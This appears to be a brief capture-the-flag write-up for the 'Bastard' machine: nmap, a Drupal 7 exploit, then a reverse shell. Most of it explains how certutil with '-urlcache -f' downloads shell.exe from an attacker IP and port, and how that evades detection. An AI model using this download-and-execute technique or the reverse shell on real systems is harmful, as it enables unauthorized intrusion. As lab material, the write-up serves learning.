🎯Bastard
I start with nmap:
On the webpage i don't find anything interesting so i decide to register a user:
Looks like we can't register
We then see that there is Drupal 7 running:
So looking at the possible exploits ->
We find this exploit:
That runs just find:
So now we are going to create a directory and import our reverse shell in it:
The command you provided uses certutil
, a command-line utility that's part of Windows. certutil
is typically used for managing certificates and certificate authority (CA) information. However, it can also be repurposed for downloading files
certutil: This is the main executable for the certificate utility.
-urlcache: This option specifies that the command is to work with the URL cache. It allows
certutil
to interact with URLs and perform operations such as retrieving data from a web address.-f: This flag stands for "force" and is used to force the operation. It means
certutil
will overwrite the file if it already exists at the specified destination.http://10.10.14.159:8080/shell.exe: This is the URL from which
certutil
will download the file. In this case, it is an executable file namedshell.exe
hosted on a server with the IP address10.10.14.159
and port8080
.c:\temp\shell.exe: This is the local path where the downloaded file will be saved. The file will be stored as
shell.exe
in thec:\temp
directory.
certutil
is available by default on Windows systems, meaning the attacker does not need to install additional software, which could be detected.
Now we just need to trigger the reverse shell:
Last updated